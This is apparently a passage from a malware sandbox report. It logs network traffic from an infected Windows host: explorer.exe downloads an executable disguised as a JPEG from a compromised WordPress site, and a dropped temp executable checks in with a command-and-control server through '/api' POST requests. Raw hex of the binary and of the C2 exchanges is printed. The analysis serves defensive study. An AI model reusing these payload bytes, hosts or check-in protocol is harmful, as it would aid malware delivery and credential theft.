                              Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 08 6e 48 ba 3c 03 e8 fb 48 e1 9a e3 ba 32 da 2d da f5 6c 5b 01 98 8b 8c c6 69 d1 30 01 00 d0 53 d8 0c 35 00 0d e4 cc 26 a7 2f f0 12 50 4f 23 75 4c cd 7c b8 74 4b e1 91 2d 33 9c 67 dd f0 e3 67 21 cd 1c e9 0b 97 a7 79 04 1d 7e 8f 1f e2 b7 c9 49 d3 93 29 75 73 e9 fa bc c5 e5 81 cf 25 a5 46 5c ac dc 98 fe 0e 01 61 42 fd 82 f5 09 e8 96 75 3a 96 2a 91 a8 4a bc aa 03 a4 41 d8 1a 48 e3 6b 93 77 2d 84 0a ff 06 61 8f 02 12 bd c8 90 5c 17 ef 38 6f f6 09 c5 1a 87 8c 73 22 6f c1 33 1c 45 09 fa f8 71 af 55 ac 31 0f c3 c8 8f 55 6a 05
                              Data Ascii: #\6nH<H2-l[i0S5&/PO#uL|tK-3gg!y~I)us%F\aBu:*JAHkw-a\8os"o3EqU1Uj


                              HTTPS Proxied Packets

                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              0192.168.2.449741185.149.100.2424432580C:\Windows\explorer.exe
                              TimestampBytes transferredDirectionData
                              2024-07-06 04:16:31 UTC179OUTGET /wp-content/images/pic2.jpg HTTP/1.1
                              Connection: Keep-Alive
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: mussangroup.com
                              2024-07-06 04:16:32 UTC451INHTTP/1.1 200 OK
                              Connection: close
                              cache-control: public, max-age=604800
                              expires: Sat, 13 Jul 2024 04:16:31 GMT
                              content-type: image/jpeg
                              last-modified: Fri, 05 Jul 2024 09:46:23 GMT
                              accept-ranges: bytes
                              content-length: 6642176
                              date: Sat, 06 Jul 2024 04:16:31 GMT
                              alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                              2024-07-06 04:16:32 UTC16384INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 08 00 f9 55 7e 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 b6 03 00 00 b6 09 00 00 00 00 00 c8 e6 4d 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 9a 00 00 04 00 00 0e 95 65 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e8 ab 4f 00 8c 00 00
                              Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PELU~fM@e@O
                              2024-07-06 04:16:32 UTC16384INData Raw: 63 02 67 94 3a f3 78 9b 6b 14 24 60 10 9b 6b 14 6e b7 14 9b 6b 14 b2 e2 9e fe 64 6b 03 f5 e8 0f 01 5f 79 49 e0 ea 4d f5 fc 39 b3 eb 63 d0 04 25 ed bd eb 1d ab 3c 29 ed bd eb dd 0a 0b 4b f2 86 09 77 fc 8d 94 3d f0 7b 96 8e 14 03 d4 7f 96 8e 14 15 8c 77 96 8e 14 b1 55 c1 f3 81 6b 46 a8 0d 02 23 02 79 49 e0 8f 0f ac 9d 39 b3 eb 04 df 09 28 ed bd eb 14 ad 3d 68 ed bd eb 9c 0a 0b 4b 59 4d 69 d2 ab 6b 94 65 de e5 ac eb 38 38 64 80 a3 94 55 c4 25 b8 2c 91 3c 72 0f 62 b9 76 89 d1 48 14 e2 7e 3d 7b 04 ef 56 7c 78 de a6 a9 9e 0d 02 9e 7d 00 c4 9e 44 e0 33 22 19 b8 80 65 b0 d6 00 77 63 b9 d7 fd f6 ef 10 be fe 16 af ca a1 b2 ce 01 15 2e 6e 7e 73 64 ce 45 f8 49 83 11 00 3c 0f bb 96 0d 29 7e 48 23 b5 ad 5d f9 31 51 82 f4 01 0f 5b 38 98 f5 70 96 9e dc 8b a4 07 bf 3b d7
                              Data Ascii: cg:xk$`knkdk_yIM9c%<)Kw={wUkF#yI9(=hKYMike88dU%,<rbvH~={V|x}D3"ewc.n~sdEI<)~H#]1Q[8p;
                              2024-07-06 04:16:32 UTC16384INData Raw: c2 f7 d9 2b d2 66 c1 e0 67 81 f1 25 5c 27 67 66 c1 ea 8c f7 d9 0b c0 e8 5f 90 08 00 8b 17 b8 12 84 3c ae 33 d3 f7 d8 0f be c8 f7 da f7 d2 d3 e8 81 f2 b4 ab 87 ab 42 d3 f0 66 03 c1 33 da e9 1d 96 1a 00 8d 94 42 61 98 6a a9 f7 d2 33 da f6 d0 66 ff c1 0f af c8 13 fa 0f b6 d1 0f ab d0 66 0b 4c 05 04 66 2b c2 f7 ea c0 f2 85 8d 6c c5 07 50 0f 9b 04 04 66 33 cb f7 d0 66 c1 e8 e3 66 f7 d9 66 81 e9 11 58 66 d1 c1 c1 3c 14 f5 c1 04 54 7b 66 81 d9 95 5d e9 39 48 5b 00 b9 28 88 38 36 8b c1 0f b3 c8 8d ac 4d ac ef 8e 93 66 c1 f9 05 8b 84 0d bf 03 c7 c9 f7 d9 51 33 c3 8d 8c 89 ae 6b 80 17 0f c1 8c 0c 97 81 9c f7 0f b3 c9 0f c8 35 94 47 91 fa e8 57 1f 0d 00 8d 54 14 08 c0 e0 82 89 0c 22 8d 94 00 2e 6e 04 4e 89 bc 14 d2 e1 d2 a4 c2 04 00 4c 60 0f 01 56 d9 9c 4d 00 29 1a
                              Data Ascii: +fg%\'gf_<3Bf3Baj3ffLf+lPf3fffXf<T{f]9H[(86MfQ3k5GWT".nNL`VM)
                              2024-07-06 04:16:32 UTC16384INData Raw: ff ff ff 66 44 0f bb ff 4e 8d 14 ed a6 80 28 a9 45 2a ef 41 32 d1 8b df 4c 0f c1 eb fe c2 d0 ca 41 52 66 42 c1 84 bc 10 fd ff ff 47 41 5a 80 da 07 44 0f b7 c3 41 8b c7 ff c3 d0 ca 02 c4 0f 8f 29 fb 17 00 44 32 ca 48 03 d4 e8 6e e2 11 00 f7 a0 08 01 bd 12 5c 4a 00 a6 5b 05 aa 5c 4a 00 66 33 ed 62 5c 4a 00 fe ba 55 fa 5c 4a 00 5e 72 15 0b a3 7b cf 94 9f ec 2c c0 00 e6 49 1f 3f 11 1b a2 1a 00 bf 62 b9 4f 54 c0 32 6e ff 7c 3e ec 69 d7 21 11 00 00 00 00 02 ae 3f c1 22 53 50 c7 ed cb 50 56 ff ff ff fd 19 97 c0 1a a9 ab 1c ab fb 5d 94 5b ac 16 06 22 00 e6 e9 a9 e7 6f b6 bf 3b f1 89 1a c8 d0 da 89 7f d2 18 d0 da 89 c7 b6 40 d0 da 89 db 2e b0 d0 da 89 6b 4e e0 d0 da 89 7f 9a a0 d0 da 89 63 3a 78 d0 da 89 8f aa 98 51 cb 8b 1b 4a a0 08 01 08 47 5c 4a 00 e7 e4 a8 07
                              Data Ascii: fDN(E*A2LARfBGAZDA)D2Hn\J[\Jf3b\JU\J^r{,I?bOT2n|>i!?"SPPV]["o;@.kNc:xQJG\J
                              2024-07-06 04:16:32 UTC16384INData Raw: 0f dc fd e0 87 d2 f0 66 98 66 33 d3 66 03 c9 66 ff c8 66 f7 d2 66 d1 ca fe c9 0f 9c c0 0f 9a c1 66 ff ca 2b c1 23 c8 66 ff c0 66 f7 d2 98 e8 c9 66 0f 00 81 ed 04 00 00 00 89 54 24 00 8b 4c 25 00 0f be c2 33 cb 80 ea 03 80 64 04 f2 8e 81 f1 91 05 11 24 c0 f8 c1 66 81 f2 35 21 41 f7 d1 e8 97 7a 55 00 e9 d3 a5 57 00 33 c3 8d 14 d5 95 47 14 e2 c7 84 4c 90 ff fe ff bf 54 81 1c 8d 84 48 5a af ce fa c0 bc 4c 90 ff fe ff c7 0f bb d2 0f c8 8d 84 48 a8 25 33 5e d3 c2 8d 94 8a 9a 04 84 f3 f7 d0 0f af c9 33 d8 c1 f1 f2 51 11 94 14 01 68 97 e6 13 e8 0f bf c2 8b 94 0f 00 00 00 cf 66 f7 d0 86 84 0c 04 00 00 cf 0a 8c 0f 04 00 00 cf 00 44 24 01 0b c0 c1 e8 75 8d bc 38 03 f8 ff ff d3 f2 89 94 c7 08 c0 ff ff 8d 14 c5 30 da a8 5d f7 9c 44 04 f0 ff ff 0f b6 ca 89 ac 04 01 f8
                              Data Ascii: ff3fffff+#fffT$L%3d$f5!AzUW3GLTHZLH%3^3QhfD$u80]D
                              2024-07-06 04:16:32 UTC16384INData Raw: 9b 10 bb 65 88 14 c5 e7 b7 65 88 14 11 51 3d 00 87 6b a0 d7 0c f6 82 7d 79 4e e0 c4 11 d7 de 39 b4 eb 47 e6 4a 37 ed ba eb 63 c3 0e 23 ed ba eb d7 0a 0c 4b fb ed 36 81 44 73 94 68 29 2a 1b 1b 14 54 e9 02 1b 1b 14 7e f1 12 1b 1b 14 f4 cc 98 7e 14 6b 1f de 9f 88 0a 74 79 4e e0 e3 62 fa ef 39 b4 eb 66 fc 6f 3a ed ba eb 6e cf 1f 62 ed ba eb 96 0a 0c 4b 9b 1a 8d 2a e9 eb 76 dd 26 1d ee 6b 7a e9 52 1d ee 6b 94 c4 e8 78 e1 14 df 8f 73 23 ed a4 23 80 88 7b ed f6 a1 a3 89 6b c0 09 c8 a8 15 9b 41 44 e6 39 9d ee db ad 3e 74 e7 65 c6 6b db 24 c4 32 c1 9b ba ec 4b c2 54 8b fb eb 5f 5e 0a c1 97 a5 41 e3 6b 16 3c 12 dd e0 eb 26 67 65 b2 eb fa e6 c3 94 0d 14 49 e2 d6 1e 6a 93 f5 ff 6d 91 17 81 33 b5 fd d3 eb 35 8b a8 3c ff 22 d9 94 65 ce 28 6d e9 0b 72 fd 29 fd c9 6c 61
                              Data Ascii: eeQ=k}yN9GJ7c#K6Dsh)*T~~ktyNb9fo:nbK*v&kzRkxs##{kAD9>tek$2KT_^Ak<&geIjm35<"e(mr)la
                              2024-07-06 04:16:32 UTC16384INData Raw: da 84 d7 89 01 08 c2 84 d7 89 1d 6c 9a 84 d7 89 79 7c 4a 84 d7 89 fd 78 ca 84 d7 89 65 94 52 84 d7 89 cd 40 cb 76 02 76 71 40 0f b3 ca f6 54 14 04 5a 58 0f 83 68 a8 50 00 f7 d2 58 05 cb 6d ef ff ff e0 c1 c8 97 d2 f2 50 66 89 54 26 00 81 74 24 00 97 04 87 bf 0f bf d0 8b 44 25 00 81 d5 04 00 00 00 8d 8c d2 03 33 b6 c7 33 c3 e9 cc de 50 00 41 bc a9 8b 81 2e 48 8b e6 41 0f b6 ec 41 8b dc 41 0f b6 cc 9d 8b d5 4f 8d bc a4 0b d0 bb 9d 4c 8d 84 8b 2c 36 96 95 5a e9 2c 86 1a 00 48 8b 3e 4c 8b 6e 08 b9 19 44 b2 67 48 8d b4 0e ef bb 4d 98 48 f7 d7 48 89 8c 0c e7 bb 4d 98 48 8d 9c 09 0b a4 01 3c 49 f7 d5 49 23 fd 48 89 bc 0e e7 bb 4d 98 48 8d bc 59 3d f3 b8 5a 45 8b bc 0b e7 bb 4d 98 4e 8d 9c 19 eb bb 4d 98 44 0f b7 b4 0c e9 bb 4d 98 45 33 f9 41 5d 4c 8d 84 09 2b bd
                              Data Ascii: ly|JxeR@vvq@TZXhPXmPfT&t$D%33PA.HAAAOL,6Z,H>LnDgHMHHMH<II#HMHY=ZEMNMDME3A]L+
                              2024-07-06 04:16:32 UTC16384INData Raw: 2c 7b 5d d2 89 41 0f ba fe 91 41 57 4e 8b 8c 2c 8b 5d d2 89 4e 89 b4 2c 8b 5d d2 89 4d 63 d2 f7 e8 41 f6 dd d3 bc fc c0 7f fd ff 49 13 ea e8 96 ed 18 00 0f ad c2 59 81 c1 51 8c fd ff ff e1 32 d3 03 c0 fe c2 8b c8 f7 54 24 04 fe c0 f6 da c7 44 24 00 b5 aa 3a ef 2b 44 24 04 f7 d1 fe c2 23 c9 fe c9 80 f1 8c d0 ca 8d 04 85 3f d4 3d 3d 66 f7 d9 f6 d2 c1 e0 e6 c1 ac 4c e7 c7 fe 8f db 59 32 da c0 b4 0c 4c 55 c5 e9 e1 66 1b c8 8d 54 14 04 80 e9 83 8b 84 4a 1c cf 8b d3 8d ac 0d 8a e7 c5 e9 89 84 29 8e e7 c5 e9 b8 99 1a 29 11 5a 0f 87 b4 21 13 00 66 0f ad c2 f7 5c 24 00 b9 b4 df b4 6c 0f be 84 0c 4c 20 4b 93 66 89 94 39 4c 20 4b 93 50 66 c1 bc 0c 51 20 4b 93 0c c0 e0 e6 8d b4 0e 48 20 4b 93 66 f7 94 0c 52 20 4b 93 0f b6 d1 8b 84 31 4c 20 4b 93 0f a3 d1 81 b4 0c 4c
                              Data Ascii: ,{]AAWN,]N,]McAIYQ2T$D$:+D$#?==fLY2LUfTJ))Z!f\$lL Kf9L KPfQ KH KfR K1L KL
                              2024-07-06 04:16:32 UTC16384INData Raw: f1 6d 30 34 91 e8 05 fb f2 54 c9 fd 28 cf f8 ec 87 ca c8 e8 a9 0c f4 8c 1b 04 fb 23 48 ff 4b e8 ac bb a1 43 7f ea c1 b7 33 c2 2e bf 62 69 62 6b 50 9e ca fa fb 5e f4 0f 2d 67 96 fc f8 a7 34 e4 ae dc 8c 5d b2 4a e3 b5 05 62 58 65 ce 30 e4 63 8d 78 73 62 eb ec 8f ca 5c 1e 3c 07 22 36 fe 11 96 b4 aa d4 00 00 00 00 b9 c2 0e 13 b9 a1 00 2f ed 6f 23 88 1e b6 d8 f2 61 9f 09 89 6a 7d 88 0c b6 26 a7 15 35 b8 76 ce bf fd 35 b8 76 1e 7b ed 35 b8 76 66 0b 8d 35 b8 76 52 6f 95 94 49 77 bb 5d 9c ed b4 e5 df 73 0f ea d3 5b 66 1c f8 49 c8 14 f5 48 ab 5a 5f 70 24 8f 56 ea 63 cc 1e 7d 62 4e e5 f8 ca 3e 6b 50 ac 35 8f 50 5b 94 5d 7f 6a 3a 4d ff 65 8a ad 4f df dd b5 6e 5d f3 ca 73 e7 a3 4d ff 91 21 f1 a0 48 9f 93 4a 1b ac ef 1a 1a b0 20 ad c2 fe ea 0c 35 e3 c9 a0 b2 60 14 82
                              Data Ascii: m04T(#HKC3.bibkP^-g4]JbXe0cxsb\<"6/o#aj}&5v5v{5vf5vRoIw]s[fIHZ_p$Vc}bN>kP5P[]j:MeOn]sM!HJ 5`
                              2024-07-06 04:16:32 UTC16384INData Raw: c6 43 8b 4c 43 fe 45 0f bf d0 4f 8d 9c 1e 03 ff f8 9a 45 0a d2 41 33 c9 41 0f bf d2 d1 c9 81 f1 ae ca 0f 9c 4d 0f a3 f2 45 0f b7 e2 41 1b c8 f7 d9 41 c0 f0 46 41 51 0f 88 2e d4 24 00 42 31 8c 34 ff fe f8 9a 66 41 81 c6 27 af 4d 8d bc d4 03 cb a6 71 0f 88 65 e8 19 00 c7 84 0c 50 80 46 a0 18 cd 99 0f f7 d8 c1 c0 03 32 8c 0c 51 80 46 a0 c1 a4 0c 8c 80 46 a0 c6 66 c1 f1 c7 48 66 c1 84 0c 86 43 46 a0 a7 c1 c0 03 66 23 8c 0c 8a 43 46 a0 0f bb c9 40 66 0f af c9 c1 c0 02 d3 b4 0c 07 87 46 a0 1d 98 0c 15 6a f7 d8 0f b3 c9 f7 d9 66 f7 54 24 07 c1 c0 02 0f c8 33 d8 51 66 21 4c 24 0c 13 f8 0f b7 44 24 0c 8b 8c 45 0e f6 fe ff 8b 44 24 04 05 29 07 f0 ff ff e0 03 ea e9 16 ef 55 00 4d 0f af fc 45 8b bc 05 00 00 00 fa 66 42 f7 94 2c 06 00 00 fa 4a 8d 84 67 bb a5 35 19 45
                              Data Ascii: CLCEOEA3AMEAAFAQ.$B14fA'MqePF2QFFfHfCFf#CF@fFjfT$3Qf!L$D$ED$)UMEfB,Jg5E


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              1192.168.2.449743188.114.97.34434628C:\Users\user\AppData\Local\Temp\8FDD.exe
                              TimestampBytes transferredDirectionData
                              2024-07-06 04:16:39 UTC266OUTPOST /api HTTP/1.1
                              Connection: Keep-Alive
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                              Content-Length: 8
                              Host: foodypannyjsud.shop
                              2024-07-06 04:16:39 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                              Data Ascii: act=life
                              2024-07-06 04:16:39 UTC806INHTTP/1.1 200 OK
                              Date: Sat, 06 Jul 2024 04:16:39 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: close
                              Set-Cookie: PHPSESSID=q5nnfffl185hj3edjsqas7diql; expires=Tue, 29-Oct-2024 22:03:18 GMT; Max-Age=9999999; path=/
                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                              Cache-Control: no-store, no-cache, must-revalidate
                              Pragma: no-cache
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XH%2FnVjQNdkTW0RGzq3teVZwLp1bh9bnV6bHtuV%2FX82xaUvF0F%2BvRA2DiRkao2EU%2BiZQepMLwpDMULIqgnrbLRlwU2ke5ec0ZtvTZ6%2FcCyGnqS88ig9Q1H9RtJbm2M5JIMrhsYCk%2B"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 89ecc7d6bbde726e-EWR
                              alt-svc: h3=":443"; ma=86400
                              2024-07-06 04:16:39 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                              Data Ascii: 2ok
                              2024-07-06 04:16:39 UTC5INData Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              2192.168.2.449745188.114.97.34434628C:\Users\user\AppData\Local\Temp\8FDD.exe
                              TimestampBytes transferredDirectionData
                              2024-07-06 04:16:40 UTC267OUTPOST /api HTTP/1.1
                              Connection: Keep-Alive
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                              Content-Length: 42
                              Host: foodypannyjsud.shop
                              2024-07-06 04:16:40 UTC42OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 62 4f 4b 48 4e 4d 2d 2d 26 6a 3d
                              Data Ascii: act=recive_message&ver=4.0&lid=bOKHNM--&j=
                              2024-07-06 04:16:40 UTC798INHTTP/1.1 200 OK
                              Date: Sat, 06 Jul 2024 04:16:40 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: close
                              Set-Cookie: PHPSESSID=rv3g2q59rmb2ij2j457i7p0et5; expires=Tue, 29-Oct-2024 22:03:19 GMT; Max-Age=9999999; path=/
                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                              Cache-Control: no-store, no-cache, must-revalidate
                              Pragma: no-cache
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wLA3bOiOR8GO57fwsyyBSFJDF9Ajick6htcM9icGwZaf9buyY4MEL6ehg98x6k2I0jDEmo2ZykAQIuIhTnIL9%2Fe08NqIqGfMl1tSjEhvT4rZlZsvN5CagaRdsR4mh5%2B9zflEuKcy"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 89ecc7dc1e4f0ca4-EWR
                              alt-svc: h3=":443"; ma=86400
                              2024-07-06 04:16:40 UTC571INData Raw: 31 64 38 32 0d 0a 51 43 71 4a 78 53 78 4c 59 44 6c 4e 42 78 2b 72 32 6b 41 4e 35 63 51 4e 57 65 38 75 67 52 30 63 30 69 45 59 64 74 42 52 4f 53 41 37 43 50 2f 6e 46 6e 39 4d 47 7a 35 69 50 5a 47 75 4d 6e 69 41 36 43 38 34 69 77 79 37 65 33 32 2b 55 6e 31 61 38 6a 52 42 41 6e 70 78 38 75 64 4a 4a 55 49 44 62 32 4a 31 79 62 73 73 62 34 53 76 59 69 6d 44 54 65 6c 78 65 37 70 45 65 78 4b 78 50 56 52 46 4a 55 2f 6f 72 30 49 69 44 56 45 67 4a 54 4f 4a 76 7a 6f 76 33 2b 5a 41 50 4a 74 50 7a 48 78 76 75 51 4e 6c 57 71 74 7a 58 45 35 69 45 4b 75 6b 53 53 6b 4d 58 79 6c 73 64 38 4f 79 4a 47 36 42 72 6e 30 77 69 55 62 70 66 33 69 37 54 6e 49 47 76 44 64 54 54 69 4e 46 36 4f 63 41 61 51 56 44 62 7a 30 39 6d 6f 6f 68 66 70 61 7a 59 69 75 4c 44 50 77 78 5a 2f 42 45 64
                              Data Ascii: 1d82QCqJxSxLYDlNBx+r2kAN5cQNWe8ugR0c0iEYdtBROSA7CP/nFn9MGz5iPZGuMniA6C84iwy7e32+Un1a8jRBAnpx8udJJUIDb2J1ybssb4SvYimDTelxe7pEexKxPVRFJU/or0IiDVEgJTOJvzov3+ZAPJtPzHxvuQNlWqtzXE5iEKukSSkMXylsd8OyJG6Brn0wiUbpf3i7TnIGvDdTTiNF6OcAaQVDbz09moohfpazYiuLDPwxZ/BEd
                              2024-07-06 04:16:40 UTC1369INData Raw: 53 70 71 62 38 69 71 4a 32 47 56 71 6d 6f 39 67 45 2f 74 66 33 75 33 54 6e 51 53 74 54 42 54 52 69 4e 47 35 36 31 4e 4c 51 45 62 59 53 56 36 30 66 68 36 4c 37 61 6c 61 7a 79 66 54 2b 30 2f 59 66 35 61 4f 68 4f 2b 63 77 4d 43 4b 45 37 6d 72 6b 55 75 43 6c 63 39 62 6e 4c 4b 73 53 56 70 6a 61 56 6e 4d 59 74 43 34 6e 68 37 74 31 46 30 48 37 38 77 55 55 52 69 42 71 75 67 56 6d 6c 61 47 77 46 6d 62 4e 2b 4b 49 58 36 57 35 6e 42 31 6c 41 7a 6b 63 7a 37 6f 41 33 4d 63 76 54 35 57 53 43 78 4e 35 71 35 50 4b 41 39 64 4a 47 52 31 77 62 77 6c 62 34 4f 72 59 44 57 4e 51 75 74 36 65 72 70 4b 4f 6c 72 79 4e 45 4d 43 65 67 6a 62 71 6b 49 69 44 68 6b 61 5a 6e 50 48 76 7a 51 76 6d 4f 68 32 65 34 70 41 6f 79 63 2b 6f 6b 68 33 46 62 77 68 56 6c 41 73 53 65 32 6e 54 53 34 47
                              Data Ascii: Spqb8iqJ2GVqmo9gE/tf3u3TnQStTBTRiNG561NLQEbYSV60fh6L7alazyfT+0/Yf5aOhO+cwMCKE7mrkUuClc9bnLKsSVpjaVnMYtC4nh7t1F0H78wUURiBqugVmlaGwFmbN+KIX6W5nB1lAzkcz7oA3McvT5WSCxN5q5PKA9dJGR1wbwlb4OrYDWNQut6erpKOlryNEMCegjbqkIiDhkaZnPHvzQvmOh2e4pAoyc+okh3FbwhVlAsSe2nTS4G
                              2024-07-06 04:16:40 UTC1369INData Raw: 48 6e 73 79 35 6d 78 37 6b 68 49 73 31 4c 37 7a 38 6d 38 45 64 32 48 4c 67 38 55 6b 67 6f 52 2b 4b 6e 52 69 41 4c 57 43 39 70 65 38 69 30 4c 6d 4b 43 70 57 6f 32 69 45 7a 76 65 48 6d 78 41 7a 52 55 74 53 73 62 47 6d 4a 34 35 71 74 46 4a 55 42 75 4c 47 74 7a 7a 71 35 69 63 4d 6d 2f 4c 7a 79 42 44 4c 73 2f 63 62 46 4f 63 42 2b 38 50 31 70 43 4a 6b 76 68 70 30 45 73 42 46 4d 6d 5a 57 2f 4f 74 79 4e 75 6a 4b 31 69 4e 59 68 4e 35 6e 67 2b 2f 67 4e 39 44 50 4a 72 47 32 38 4c 63 71 75 34 41 44 42 43 58 43 4d 6c 4a 59 6d 38 4b 47 2b 4b 72 47 51 30 6a 6b 76 74 66 33 4f 36 55 58 49 55 73 6a 31 64 51 79 35 4e 36 71 74 4e 4f 77 35 64 49 6d 4e 31 32 2f 68 73 4c 34 43 2b 4c 32 50 4e 62 4f 68 7a 66 62 78 43 66 56 61 54 4f 56 68 4a 4c 67 72 65 70 45 41 6e 42 55 31 76 65
                              Data Ascii: Hnsy5mx7khIs1L7z8m8Ed2HLg8UkgoR+KnRiALWC9pe8i0LmKCpWo2iEzveHmxAzRUtSsbGmJ45qtFJUBuLGtzzq5icMm/LzyBDLs/cbFOcB+8P1pCJkvhp0EsBFMmZW/OtyNujK1iNYhN5ng+/gN9DPJrG28Lcqu4ADBCXCMlJYm8KG+KrGQ0jkvtf3O6UXIUsj1dQy5N6qtNOw5dImN12/hsL4C+L2PNbOhzfbxCfVaTOVhJLgrepEAnBU1ve
                              2024-07-06 04:16:40 UTC1369INData Raw: 69 49 63 65 68 64 33 76 56 44 4d 39 34 63 35 35 49 64 68 50 79 4c 42 56 62 59 6b 2f 6e 35 78 5a 70 44 6c 45 6a 62 48 33 41 76 53 70 6b 6a 71 4e 75 4d 49 68 50 35 58 4a 78 75 56 46 77 46 37 77 77 56 30 34 6b 53 65 69 31 52 69 42 43 46 57 39 69 5a 59 6e 67 59 6b 36 4a 71 33 73 38 6e 51 7a 38 4d 57 66 77 52 48 5a 55 36 6e 4e 59 51 79 31 4c 36 71 70 49 49 41 70 62 4b 57 42 79 78 4c 59 6c 61 49 65 72 59 54 53 4c 52 4f 35 7a 64 62 35 4b 66 42 53 7a 4f 52 73 4d 59 6b 2f 7a 35 78 5a 70 4d 6c 67 76 5a 57 61 4a 70 32 78 32 78 36 46 6a 65 39 55 4d 38 58 56 33 73 45 42 31 45 37 59 34 56 30 63 6e 52 2b 69 75 53 79 41 4d 53 53 5a 72 64 63 47 33 4a 32 53 48 71 32 55 33 6a 55 2b 6a 4d 54 36 33 57 7a 70 4d 38 67 46 57 54 6a 52 50 35 4f 64 52 5a 78 73 62 4b 47 6b 39 6b 66
                              Data Ascii: iIcehd3vVDM94c55IdhPyLBVbYk/n5xZpDlEjbH3AvSpkjqNuMIhP5XJxuVFwF7wwV04kSei1RiBCFW9iZYngYk6Jq3s8nQz8MWfwRHZU6nNYQy1L6qpIIApbKWByxLYlaIerYTSLRO5zdb5KfBSzORsMYk/z5xZpMlgvZWaJp2x2x6Fje9UM8XV3sEB1E7Y4V0cnR+iuSyAMSSZrdcG3J2SHq2U3jU+jMT63WzpM8gFWTjRP5OdRZxsbKGk9kf
                              2024-07-06 04:16:40 UTC1369INData Raw: 35 6d 67 6a 7a 52 53 6a 58 47 6d 67 54 6a 6f 4c 2f 43 6f 62 52 53 34 49 73 2b 64 47 4a 41 70 52 4b 32 4a 77 7a 72 34 72 66 59 36 6a 59 54 75 4a 52 2b 78 35 65 72 4e 44 61 42 4b 32 4f 31 68 50 4c 30 62 6f 6f 77 35 6e 51 6c 77 33 4a 53 57 4a 69 69 39 68 6e 4b 6c 6f 4b 6f 63 4d 2f 44 46 6e 38 45 52 32 56 4f 70 7a 58 30 77 77 51 2b 71 73 52 53 63 46 56 43 70 76 66 63 61 38 49 57 47 4d 70 32 77 7a 67 45 48 74 64 58 65 35 52 48 59 51 74 58 4d 56 41 69 56 51 71 2f 38 4f 41 69 4e 32 41 32 4a 6e 69 61 64 73 64 73 65 68 59 33 76 56 44 4f 39 32 63 72 70 49 66 52 36 38 4f 6c 56 4a 4d 46 72 6f 6f 30 30 67 41 56 77 6d 61 33 33 4f 76 53 78 6f 68 71 31 72 4d 59 35 4b 6f 7a 45 2b 74 31 73 36 54 50 49 66 57 45 49 76 55 71 75 34 41 44 42 43 58 43 4d 6c 4a 59 6d 79 49 32 75
                              Data Ascii: 5mgjzRSjXGmgTjoL/CobRS4Is+dGJApRK2Jwzr4rfY6jYTuJR+x5erNDaBK2O1hPL0boow5nQlw3JSWJii9hnKloKocM/DFn8ER2VOpzX0wwQ+qsRScFVCpvfca8IWGMp2wzgEHtdXe5RHYQtXMVAiVQq/8OAiN2A2JniadsdsehY3vVDO92crpIfR68OlVJMFroo00gAVwma33OvSxohq1rMY5KozE+t1s6TPIfWEIvUqu4ADBCXCMlJYmyI2u
